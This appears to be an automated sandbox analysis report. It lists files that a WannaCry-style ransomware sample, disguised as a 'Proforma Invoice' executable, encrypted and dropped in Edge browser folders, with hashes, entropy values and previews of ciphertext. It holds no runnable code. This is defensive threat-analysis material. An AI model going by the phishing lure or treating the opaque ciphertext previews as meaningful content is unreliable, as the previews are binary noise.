                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28904
                                                          Entropy (8bit):7.9943617265517135
                                                          Encrypted:true
                                                          SSDEEP:768:jE0O6Jhvdg9otXxGcSaf3Fu/zhdurxlfJRsbNeCX:jE89g9o9xGqs7hsdlfJRsbNeCX
                                                          MD5:1AE80786BB7600618DE6A8199D468FD6
                                                          SHA1:562B2EA9482E92012F3C41B5D33D92CD9DFC318B
                                                          SHA-256:C324EAF8BC55F0F1335DB73D57B3B437712F11027ED85574792C3F3691BA4D52
                                                          SHA-512:AFA4B6133A2AAB2E5C3E0BA84B4968D55D1B0DA4C2345140F95D125E0797E8C4CE4470EDD5D806C685CBAAC4D70B08A6947CB52D0F6B9647418BC6F79DBA8DD5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1..Z.^:H..aGoX.Q......$.........\]....[<4/TL..O...b. .].:..........!.X.V...\....l.......=.........z.z@!.!..O.M......8....~@....-.....o./N#.D....L..V..w..G#X...q...G....1...v..H.. 1...H.....&.q....k..X..)z.,>..s.q.:.\....l........s|iU........o........h~>.=~.:f.~.h\..$.)....~....s....`.-...&-.a4........5...7.d....t|AZ.....`....>!...u..$G3.M#@..b.8i....S3....R..p..M.. .=..W.K..#.M.r...7.w.cI&<.].<I...0..1.C..........o..I....\.:c............f.G.Qz.....T.]...>.GP....~..y......). .P"B........E...cw..>X......y..[.V....x|..z-...#.....3sr.q...sh...!.....u.<b..r.7..99.....hz.K...g..#..l?.W^.N/.P...u..}.bg..f%C|.M.z-....f.C.IJNMOX.,..."........W.=2..$..?....'.B.g.3J..a5.....5.......T...".x!.....C.OB.&P....:.^#..S...G.8.I......$+V..~t......e.(.!x...3..G.?..@=..J..c.@.....F....z..B.:.'_.P.T$...m....>\..-.Q.y.m....E.Bg.y..A.\;.....O...o..\fC....O.B...`.r....r..A..$d....%.Y.8....p<.....b...M..D.....0A$....u.d.1....z{..g...JX.-..J.3..C.4..p.D

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2920
                                                          Entropy (8bit):7.938887704631897
                                                          Encrypted:false
                                                          SSDEEP:48:bkw9pTowsKB5mFZTkbVrFv+WDGU3/EvisAIRn0lJGXEB1/XGaLMWhJYlv7EX5Uoq:oCTowzB5gZA8WDGUMqsAIN69oWwlv7E6
                                                          MD5:6E395D18C091E4983F0BBBE85E226EC2
                                                          SHA1:506D99951ECE9E6CD4F35FAE9DD365BA8BAAEBB2
                                                          SHA-256:AD279051446B0CB00483FEBF439F7AB39FDAFAAEA1EDD9A795B368CFA57DE304
                                                          SHA-512:335984980911527483D9F98A8705BE8D2ED2E28B266CDF54C0638B693CB70ADAE621F7EA8FDB9F1E2953AACB4A232FB47378ECDA8942DA086F2AE459B0AFBF09
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....\..R.a.;.......e..D.;.jY.^U.~......w.z}.\.....q......c.X...6..........Us...Jf.3N...a...O.......N..F.~.~.f....r....q...Ss.c.L..&.......=m..?FiTf2.9=..'_.Q...Y.F......^..d......q....om.k..@Z. .7.^i.^..........g......D..B.i.G].eg.."..S....{(c....p.*.....F.........^S...L...b..W0.....rBq....L.vi.#...6.]kW6..(..c..P~..\.3..t....lx.!..9..wv...+..U..^....S."*.*.......!....l<.L.N...[.f}Y`.|+....$.5[.%....T._.3...g.A..s3....fh..:E..k.x.#.,.QhF..$&..F....Q.........$~....m..[0.P..S....>.......>....2Q..{...._..d.N&*.....D.....,.q.zCU......M.t...8CuFzN.!=.e...7.g......bH..........K6.........e;T......<j.|...(EQl.........e..%....(........pxy..... ....Re)..l.....6Ha...fQc.t..|..d.R.9%R...@..\Y...O...M....j.......4..Z...w.j8&M.d...nj..4H..... ..s5...3..R..*J&7e...F..lt....Z...I?_..L..)...Lh.a......V.@ .&"D.?!I..?..F.R!.#!....|..;..n.E...*...E..W.|....8.N.Z.'.H..{<..@..^";.n]`J...:M.m."2..*.....#...lw.....Y........q2..n.......VB#M.T[....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2920
                                                          Entropy (8bit):7.938887704631897
                                                          Encrypted:false
                                                          SSDEEP:48:bkw9pTowsKB5mFZTkbVrFv+WDGU3/EvisAIRn0lJGXEB1/XGaLMWhJYlv7EX5Uoq:oCTowzB5gZA8WDGUMqsAIN69oWwlv7E6
                                                          MD5:6E395D18C091E4983F0BBBE85E226EC2
                                                          SHA1:506D99951ECE9E6CD4F35FAE9DD365BA8BAAEBB2
                                                          SHA-256:AD279051446B0CB00483FEBF439F7AB39FDAFAAEA1EDD9A795B368CFA57DE304
                                                          SHA-512:335984980911527483D9F98A8705BE8D2ED2E28B266CDF54C0638B693CB70ADAE621F7EA8FDB9F1E2953AACB4A232FB47378ECDA8942DA086F2AE459B0AFBF09
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....\..R.a.;.......e..D.;.jY.^U.~......w.z}.\.....q......c.X...6..........Us...Jf.3N...a...O.......N..F.~.~.f....r....q...Ss.c.L..&.......=m..?FiTf2.9=..'_.Q...Y.F......^..d......q....om.k..@Z. .7.^i.^..........g......D..B.i.G].eg.."..S....{(c....p.*.....F.........^S...L...b..W0.....rBq....L.vi.#...6.]kW6..(..c..P~..\.3..t....lx.!..9..wv...+..U..^....S."*.*.......!....l<.L.N...[.f}Y`.|+....$.5[.%....T._.3...g.A..s3....fh..:E..k.x.#.,.QhF..$&..F....Q.........$~....m..[0.P..S....>.......>....2Q..{...._..d.N&*.....D.....,.q.zCU......M.t...8CuFzN.!=.e...7.g......bH..........K6.........e;T......<j.|...(EQl.........e..%....(........pxy..... ....Re)..l.....6Ha...fQc.t..|..d.R.9%R...@..\Y...O...M....j.......4..Z...w.j8&M.d...nj..4H..... ..s5...3..R..*J&7e...F..lt....Z...I?_..L..)...Lh.a......V.@ .&"D.?!I..?..F.R!.#!....|..;..n.E...*...E..W.|....8.N.Z.'.H..{<..@..^";.n]`J...:M.m."2..*.....#...lw.....Y........q2..n.......VB#M.T[....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1441224
                                                          Entropy (8bit):7.999862987686474
                                                          Encrypted:true
                                                          SSDEEP:24576:dwtBWrzZ0i536N1tWNYwIGxAHa49mGiINUQekQOnBeoDkHNUwew:dwtBEzZ0UA12YaGHaomGiImQPQOnBeoE
                                                          MD5:A817DE3A2DA323C5AB5FD407703E1A33
                                                          SHA1:60E81607AFA834B3CE3FDB02E02528D1C84AA848
                                                          SHA-256:FD5A985DDA28C4748C0E19D1B9BB055A523673114EF71D1C3EA13C0A38D17874
                                                          SHA-512:5EEAFA36FBAF6D3C7B0726507F92DA7C9546CB3299CECB6D3B63DFE10E99D7DBECAF7A26C912E1F015866E81CE3F526685E4EF116FA5CC66C9C3D8F8C15D81F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....K....8..v......B.vu...-..t.~k.n.v...}<-\...kk....%.6.L..X..4.5....3.4?9.zu.|.H.}..%.B....4z.G...A.....I...k7F..X.......c.y`........6..3.=...=....(.+9..rKN..o(RI..?&.X...J.Wx.\(.#....*<..x......."...Z......:........b.6%...8..NGm<......O.My D..=................) ....b...+......H..&......+pq..E.!../...?x`y..j......K....b.#.HF....x...@..{....:C....CpDL.I....2..xv.VT<8..H....S..0.37`..SHp..w:..K........1..B.Jr.EZ_....Z...b.;.KSbb..rC.xM..IAm...IY!K.gY2..h<["..;6g...l..CK4..~....v.ap.^r.3F..Iw.C...d.9.]0.}..S....;N..j...=...H..$.j._a.hH.......-!o.a37`c..j=.:..^......&%Lr..5.veP..<G..6......5.'.iV np6..{.Aj.......i.s.L7.$..'.O.......o..G..t.9.W.........}v..V...joa.$..^...o...5.....ge]Z.vX.. .....s.....8n.,...+.)....*....A.h.....p.....^#...VK3b&.....I.+.NQ%.g.$.+..)...'..... ..'{.....&...E...].T.=..L....cW.r...V..k(...8GK.sE..u..=.f3..e....p.....He.L...&.....8>V.j.-}....`}...dY..C}.B...D.%...&.3:,....Z,.....-..}...xq.#>F...O.._.#

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1441224
                                                          Entropy (8bit):7.999862987686474
                                                          Encrypted:true
                                                          SSDEEP:24576:dwtBWrzZ0i536N1tWNYwIGxAHa49mGiINUQekQOnBeoDkHNUwew:dwtBEzZ0UA12YaGHaomGiImQPQOnBeoE
                                                          MD5:A817DE3A2DA323C5AB5FD407703E1A33
                                                          SHA1:60E81607AFA834B3CE3FDB02E02528D1C84AA848
                                                          SHA-256:FD5A985DDA28C4748C0E19D1B9BB055A523673114EF71D1C3EA13C0A38D17874
                                                          SHA-512:5EEAFA36FBAF6D3C7B0726507F92DA7C9546CB3299CECB6D3B63DFE10E99D7DBECAF7A26C912E1F015866E81CE3F526685E4EF116FA5CC66C9C3D8F8C15D81F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....K....8..v......B.vu...-..t.~k.n.v...}<-\...kk....%.6.L..X..4.5....3.4?9.zu.|.H.}..%.B....4z.G...A.....I...k7F..X.......c.y`........6..3.=...=....(.+9..rKN..o(RI..?&.X...J.Wx.\(.#....*<..x......."...Z......:........b.6%...8..NGm<......O.My D..=................) ....b...+......H..&......+pq..E.!../...?x`y..j......K....b.#.HF....x...@..{....:C....CpDL.I....2..xv.VT<8..H....S..0.37`..SHp..w:..K........1..B.Jr.EZ_....Z...b.;.KSbb..rC.xM..IAm...IY!K.gY2..h<["..;6g...l..CK4..~....v.ap.^r.3F..Iw.C...d.9.]0.}..S....;N..j...=...H..$.j._a.hH.......-!o.a37`c..j=.:..^......&%Lr..5.veP..<G..6......5.'.iV np6..{.Aj.......i.s.L7.$..'.O.......o..G..t.9.W.........}v..V...joa.$..^...o...5.....ge]Z.vX.. .....s.....8n.,...+.)....*....A.h.....p.....^#...VK3b&.....I.+.NQ%.g.$.+..)...'..... ..'{.....&...E...].T.=..L....cW.r...V..k(...8GK.sE..u..=.f3..e....p.....He.L...&.....8>V.j.-}....`}...dY..C}.B...D.%...&.3:,....Z,.....-..}...xq.#>F...O.._.#

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet-icon.svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2008
                                                          Entropy (8bit):7.908545865090877
                                                          Encrypted:false
                                                          SSDEEP:48:bk1HrwhR1vgzf6PzniUJUREd2QwsC4KgMJLp:o1LhzgYagccLp
                                                          MD5:7DB187CBA8905EA01882AB6CA002EB3D
                                                          SHA1:6C9808BB52AE6BE7B13CD33DB28910AB2FF5715F
                                                          SHA-256:E4F806FA44A411EDD054ECD1DA42ED6210E306D3D0FE6734ABD69EEDBB70E459
                                                          SHA-512:DD356AA061D3B00B4772033D238FC0236DADA53A4510CC9C56CF68867A99E36EEBDF93830758A8331388AAF38B9FB67533A21653457626C7104DA1445FA54286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<..!{r....z|....\.QB.;...h.>2lbx..3.,..}......ny..O..Ws.....V.f.a.u..s"..*1.n...,.4@e......|...z.......q0..(E....:.....X...T...>j7..l.m..8....M..0..@...........+%D.%R.N..@.\./ ..lu.w.4....(PW.!.I'...Nk(EtG....*b......v...i.={....z.[.g.|.b.............n.......-..O........D?..8.u..'...WJ.f.E..$..h.&w[....e#.&...2.......f.c7 .6>.@.`.X.od6.....rDs...?g%..o...H.}...e:...9...@.`220..d.D.c..k%+}X.h.v..H...5.m.#.>.) ..~.k.V....@3X.'.B.l....v.......$......~ok+..\Q.U.3....]1.M..g....3.....R./.......`....8....~.CVY..`.tO=...K...........Lpe.^K......#.+j..l2?..?..nXf..x.T..n...W....sE....dw....I]1.q .\.p+.>0.y....Lt..'..@....f........|..*...2{..%c0..'S%?CZ..GW>..N.y.^~...0.......Cq.].)....MLl.........L.R..(...SVy....z.R(K..B......nE#..z.......c.{..fY.......p.../.......e.R.b.iN.H........U......a..c...L..5C..G.N.1."r(..%l.D.y.{..I%.f...;&....Y..8.R.*Hmto...I.W....A. ....a...S........^......Dl....^9...$.....N.Y...5.a...f..=Q.2.3.^&.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet-icon.svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2008
                                                          Entropy (8bit):7.908545865090877
                                                          Encrypted:false
                                                          SSDEEP:48:bk1HrwhR1vgzf6PzniUJUREd2QwsC4KgMJLp:o1LhzgYagccLp
                                                          MD5:7DB187CBA8905EA01882AB6CA002EB3D
                                                          SHA1:6C9808BB52AE6BE7B13CD33DB28910AB2FF5715F
                                                          SHA-256:E4F806FA44A411EDD054ECD1DA42ED6210E306D3D0FE6734ABD69EEDBB70E459
                                                          SHA-512:DD356AA061D3B00B4772033D238FC0236DADA53A4510CC9C56CF68867A99E36EEBDF93830758A8331388AAF38B9FB67533A21653457626C7104DA1445FA54286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....<..!{r....z|....\.QB.;...h.>2lbx..3.,..}......ny..O..Ws.....V.f.a.u..s"..*1.n...,.4@e......|...z.......q0..(E....:.....X...T...>j7..l.m..8....M..0..@...........+%D.%R.N..@.\./ ..lu.w.4....(PW.!.I'...Nk(EtG....*b......v...i.={....z.[.g.|.b.............n.......-..O........D?..8.u..'...WJ.f.E..$..h.&w[....e#.&...2.......f.c7 .6>.@.`.X.od6.....rDs...?g%..o...H.}...e:...9...@.`220..d.D.c..k%+}X.h.v..H...5.m.#.>.) ..~.k.V....@3X.'.B.l....v.......$......~ok+..\Q.U.3....]1.M..g....3.....R./.......`....8....~.CVY..`.tO=...K...........Lpe.^K......#.+j..l2?..?..nXf..x.T..n...W....sE....dw....I]1.q .\.p+.>0.y....Lt..'..@....f........|..*...2{..%c0..'S%?CZ..GW>..N.y.^~...0.......Cq.].)....MLl.........L.R..(...SVy....z.R(K..B......nE#..z.......c.{..fY.......p.../.......e.R.b.iN.H........U......a..c...L..5C..G.N.1."r(..%l.D.y.{..I%.f...;&....Y..8.R.*Hmto...I.W....A. ....a...S........^......Dl....^9...$.....N.Y...5.a...f..=Q.2.3.^&.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2937064
                                                          Entropy (8bit):7.999938422952748
                                                          Encrypted:true
                                                          SSDEEP:49152:etnw7Ka1OvrElSDFjkEwPo2ixgw6nPZ7x7Aeqdqb3oa0+LwrG89yrb8rtIAXX2:etQK1jqSdPwPov8B7xPr3IrG89yrb0bW
                                                          MD5:9D8F14667FE899F1F1FA404B5FFDAA9A
                                                          SHA1:1FC2DA1D1E1508EFA45BD3F4DA7EDD47BFBF2778
                                                          SHA-256:6D05076CAB91B9A8008B41E8440F45745C233915FAD8878D240A8E64A9E78322
                                                          SHA-512:40220A9CE6931C1AECDD4D72904DF9A347E1008B40C7DFBC0C6D2B353095F5779F11295794855DA7B31D99CEEE2916714D2ECC7653D89CC5BF5716B039D5C2E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....[n.8.....$.b`.^#%oy.4.G>.....w.k]K.i..$#^v,..A..L.6[...J.Q.>A..D.Y..k..?d....{.L.`^".....l.d.K..8.v.(".>#.$E.i.qm..Q..B..E.%.5...g..g.5.+.D?.V..6d].3....n...,7.y.[R."+t...qG..A9..H.3q.~...4 ..T....6;.Z...2.).l.4...S...O...O.}...J..S.$.!...E.36..}......,.....Q....n.....e.ny ..8.[..fW../%|..C.J.....mHL...;.[...2.8.d.).x6... H.$V.....t.....*z.W=...p...s...^.K`..O.s..i........3.;[<.GQ..0.......Z..)x..Q.....l'F.y.0.<x..1[.%.!...H.M.k.g.7...$.?h.L5..`..tC.".s..C...].ij.(p<rf..9...;w@.n..d4.. .....9m.Jh....~..&...x.(..1kBDqXorf.]d....ih-.J8. ..]h}I..]O....x>.#..Av...n._ID;&x./Cz.]g.r...L^.J>.A.f=.NAB.G.ev...7.u....)......A.(.V.O.of..k..jE......C.c.>.k..!.G....~...V.N..!....f.... ...)7.&..4.....>.u.......+R..+.L.S...5..=#s........N..D.....^-..}....c.BZ.#.]....G.,.=.'!PqU..H.+.1.c.BD...I.I..k..\.y5.+Qy.;z..^<.Wt.$\...!.&..0.^..0..N.1..fI......|..,.......|.ry....f..@.......W.<..x..j.[ .]G+......h.:.%k.....1.5fa.c.rVy. ..^..0.Z..Z<......,.#B.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2937064
                                                          Entropy (8bit):7.999938422952748
                                                          Encrypted:true
                                                          SSDEEP:49152:etnw7Ka1OvrElSDFjkEwPo2ixgw6nPZ7x7Aeqdqb3oa0+LwrG89yrb8rtIAXX2:etQK1jqSdPwPov8B7xPr3IrG89yrb0bW
                                                          MD5:9D8F14667FE899F1F1FA404B5FFDAA9A
                                                          SHA1:1FC2DA1D1E1508EFA45BD3F4DA7EDD47BFBF2778
                                                          SHA-256:6D05076CAB91B9A8008B41E8440F45745C233915FAD8878D240A8E64A9E78322
                                                          SHA-512:40220A9CE6931C1AECDD4D72904DF9A347E1008B40C7DFBC0C6D2B353095F5779F11295794855DA7B31D99CEEE2916714D2ECC7653D89CC5BF5716B039D5C2E9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....[n.8.....$.b`.^#%oy.4.G>.....w.k]K.i..$#^v,..A..L.6[...J.Q.>A..D.Y..k..?d....{.L.`^".....l.d.K..8.v.(".>#.$E.i.qm..Q..B..E.%.5...g..g.5.+.D?.V..6d].3....n...,7.y.[R."+t...qG..A9..H.3q.~...4 ..T....6;.Z...2.).l.4...S...O...O.}...J..S.$.!...E.36..}......,.....Q....n.....e.ny ..8.[..fW../%|..C.J.....mHL...;.[...2.8.d.).x6... H.$V.....t.....*z.W=...p...s...^.K`..O.s..i........3.;[<.GQ..0.......Z..)x..Q.....l'F.y.0.<x..1[.%.!...H.M.k.g.7...$.?h.L5..`..tC.".s..C...].ij.(p<rf..9...;w@.n..d4.. .....9m.Jh....~..&...x.(..1kBDqXorf.]d....ih-.J8. ..]h}I..]O....x>.#..Av...n._ID;&x./Cz.]g.r...L^.J>.A.f=.NAB.G.ev...7.u....)......A.(.V.O.of..k..jE......C.c.>.k..!.G....~...V.N..!....f.... ...)7.&..4.....>.u.......+R..+.L.S...5..=#s........N..D.....^-..}....c.BZ.#.]....G.,.=.'!PqU..H.+.1.c.BD...I.I..k..\.y5.+Qy.;z..^<.Wt.$\...!.&..0.^..0..N.1..fI......|..,.......|.ry....f..@.......W.<..x..j.[ .]G+......h.:.%k.....1.5fa.c.rVy. ..^..0.Z..Z<......,.#B.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet_donation_driver.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1160
                                                          Entropy (8bit):7.825784384656725
                                                          Encrypted:false
                                                          SSDEEP:24:bkAYXY2pXecm54WpDhpeeFuOM7MUz6+XlZ/sOIFgzucSIVVI6:bk82pXW4MDeCjK6+XvsrFgzucSoVI6
                                                          MD5:FB74B973AF4E19F1E2689B51D1613A8D
                                                          SHA1:9CE74CC02AB67B118F3DA53711452465A0901EFA
                                                          SHA-256:AB5373AF98752D08E7D9E65F1DF679BBE3B1D7A1CC4B143677D7C445227E6811
                                                          SHA-512:EECE961C84B6EEDE8B8E1ABA775652535D03E2AADE932EC44B6BE76113125E9FD899B3BD5A15E2F7CFB58CAE6059D4E1C881D642425E257E87CBA63005BF8F56
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....0'.Tx.&j|.=.7@.....,+..3DI0ce.aH.u.r... .).}....FR]..Z.K.."./`.p...f..X.f...S.....o.Y(...2Ac!qC..... ..?...'"ur....~..~b..,...).Q.j7w.P.k...K...P.....4...Y....xq_t...o..g.C...e.../&._..e.....^...m[.C.j...'.i...B.......}4...&./..X(v....5...|....a........K....6..%....X.L.q..i.....3).V......x..4.#.....W"...{.....e|..8.B...\4..ya..Q..A@..3.6T....."..H.7.A...8D.V.....Tj...hI..04.,%D]....\..w...yL..F.W%I..}q.......w..}..4.J...Z..`P........$.}..&.......h..T#........n........S....r...f?Wl..<.@ .....%..1..n.I..........u..H.#k...X...o....O.1\.e..>..h'^.R.r;r.sY..M.Cn..%...C....Ab..W..-.@...cf.&&.y+w...*!i..w\.@..5.wn[..C......gR0.......*.Qgh.z.n....)`..+........aU..1...6.....J.a:k...p.>.q.../...`Mc.U$"..<..i.e..._.FE'zt.w.....T[.M;I...8.2T.D...~.T.....1...A..2.Q.$#....v.D...e..{....w.W..vT4.3S.k8.l...^*.nH..O./.n..F.Te...97.....x. a.`...>lA.kT .....t,Rv...r2..!...E..C*.-.O...XS.6....-5.v....(.~......^.F5.sG..[...M.6v(..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet_donation_driver.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1160
                                                          Entropy (8bit):7.825784384656725
                                                          Encrypted:false
                                                          SSDEEP:24:bkAYXY2pXecm54WpDhpeeFuOM7MUz6+XlZ/sOIFgzucSIVVI6:bk82pXW4MDeCjK6+XvsrFgzucSoVI6
                                                          MD5:FB74B973AF4E19F1E2689B51D1613A8D
                                                          SHA1:9CE74CC02AB67B118F3DA53711452465A0901EFA
                                                          SHA-256:AB5373AF98752D08E7D9E65F1DF679BBE3B1D7A1CC4B143677D7C445227E6811
                                                          SHA-512:EECE961C84B6EEDE8B8E1ABA775652535D03E2AADE932EC44B6BE76113125E9FD899B3BD5A15E2F7CFB58CAE6059D4E1C881D642425E257E87CBA63005BF8F56
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....0'.Tx.&j|.=.7@.....,+..3DI0ce.aH.u.r... .).}....FR]..Z.K.."./`.p...f..X.f...S.....o.Y(...2Ac!qC..... ..?...'"ur....~..~b..,...).Q.j7w.P.k...K...P.....4...Y....xq_t...o..g.C...e.../&._..e.....^...m[.C.j...'.i...B.......}4...&./..X(v....5...|....a........K....6..%....X.L.q..i.....3).V......x..4.#.....W"...{.....e|..8.B...\4..ya..Q..A@..3.6T....."..H.7.A...8D.V.....Tj...hI..04.,%D]....\..w...yL..F.W%I..}q.......w..}..4.J...Z..`P........$.}..&.......h..T#........n........S....r...f?Wl..<.@ .....%..1..n.I..........u..H.#k...X...o....O.1\.e..>..h'^.R.r;r.sY..M.Cn..%...C....Ab..W..-.@...cf.&&.y+w...*!i..w\.@..5.wn[..C......gR0.......*.Qgh.z.n....)`..+........aU..1...6.....J.a:k...p.>.q.../...`Mc.U$"..<..i.e..._.FE'zt.w.....T[.M;I...8.2T.D...~.T.....1...A..2.Q.$#....v.D...e..{....w.W..vT4.3S.k8.l...^*.nH..O./.n..F.Te...97.....x. a.`...>lA.kT .....t,Rv...r2..!...E..C*.-.O...XS.6....-5.v....(.~......^.F5.sG..[...M.6v(..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\adblock_snippet.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.915666752910738
                                                          Encrypted:false
                                                          SSDEEP:48:bkihRV/bXIMUiHXL5XTy4I8Vf/hAxwQMkXT9zgCVJHjZwFtfqxeZ0j1:oiztIKHhW4IAHhAx9MkXT9zXVj+FtfqX
                                                          MD5:99E07233235CB0E6FA5DAE4490B24BD1
                                                          SHA1:E601D8B8DC0DDDFDB3D73F640DA82A3DCEF1B6CB
                                                          SHA-256:CFFDE9A98E7D8A1839D18B9A4BECB8B54A4B95E208562C7FA86A4C22103162E2
                                                          SHA-512:53DC85948642823D29C94A2CE50D182075037795CF6AB40EE0E5BF032D03D88F5B086A94B3907C9D0440FDB7CF5B65E296CCFBF87D54F03C2D1C27BEFBBE39B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$s:..~.a...:\..+...%.S..j...:....&d;..B|..z.....$....).;D.>?....!P..t,....E5......^.A=..f..zo*.....w.J.6...E,.~..-.JT..'k.e..e.w...za....Vj.G.v..k.=.j....5z`^;Ax..U....wh{.U=...*.n.}.d ....P.. ..5.e[.&.v..5..g .(.<.&_......s.......oz@......g.............%....coX....b...~...c+v..<......4.0.n.ol.x..s.e...>.S.6...A..[..m..ET.-.#J&..2O...r.1..r.....R.....Om..e..v..&;..a...(.......A.....R.a.....Thz...FL.......F.8.....v..l....TQ...p.r.).1...~$C.p.o..p...X..f.....~0lD1P.B.._.3.t.8.X.Q{G...>...L...YHV...]7%.)..B...`3...&...P...."....+..[.Rd-.&....)$..H;.>.Ah.._...u\.O.g.P7.8L.*..(....N.......bO.4r..M ..~%...+*...d...C....Xf.d.Z.3.....@.......f....*.....jbi..E..6.H.*.t.*...,.*.!}\..T|...;..x..T..M....Xf.k<..'.......z..'.h.?...H.j.....<....|.- ..=.h...3.._ _......2da..n:]f=_#.n.....Q.A..Pt..jX..AF.....zM.......Fs..5..=..~.F...0.e.,x.1.Ur..2....{..s.ZM....Z..\.xY...N..m.{...M.U&...cj...}..J}. .*e..........E,T.c.1.Y..41.....:..er.L....lU......

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\adblock_snippet.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2600
                                                          Entropy (8bit):7.915666752910738
                                                          Encrypted:false
                                                          SSDEEP:48:bkihRV/bXIMUiHXL5XTy4I8Vf/hAxwQMkXT9zgCVJHjZwFtfqxeZ0j1:oiztIKHhW4IAHhAx9MkXT9zXVj+FtfqX
                                                          MD5:99E07233235CB0E6FA5DAE4490B24BD1
                                                          SHA1:E601D8B8DC0DDDFDB3D73F640DA82A3DCEF1B6CB
                                                          SHA-256:CFFDE9A98E7D8A1839D18B9A4BECB8B54A4B95E208562C7FA86A4C22103162E2
                                                          SHA-512:53DC85948642823D29C94A2CE50D182075037795CF6AB40EE0E5BF032D03D88F5B086A94B3907C9D0440FDB7CF5B65E296CCFBF87D54F03C2D1C27BEFBBE39B6
                                                          Malicious:false
                                                          Reputation:unknown
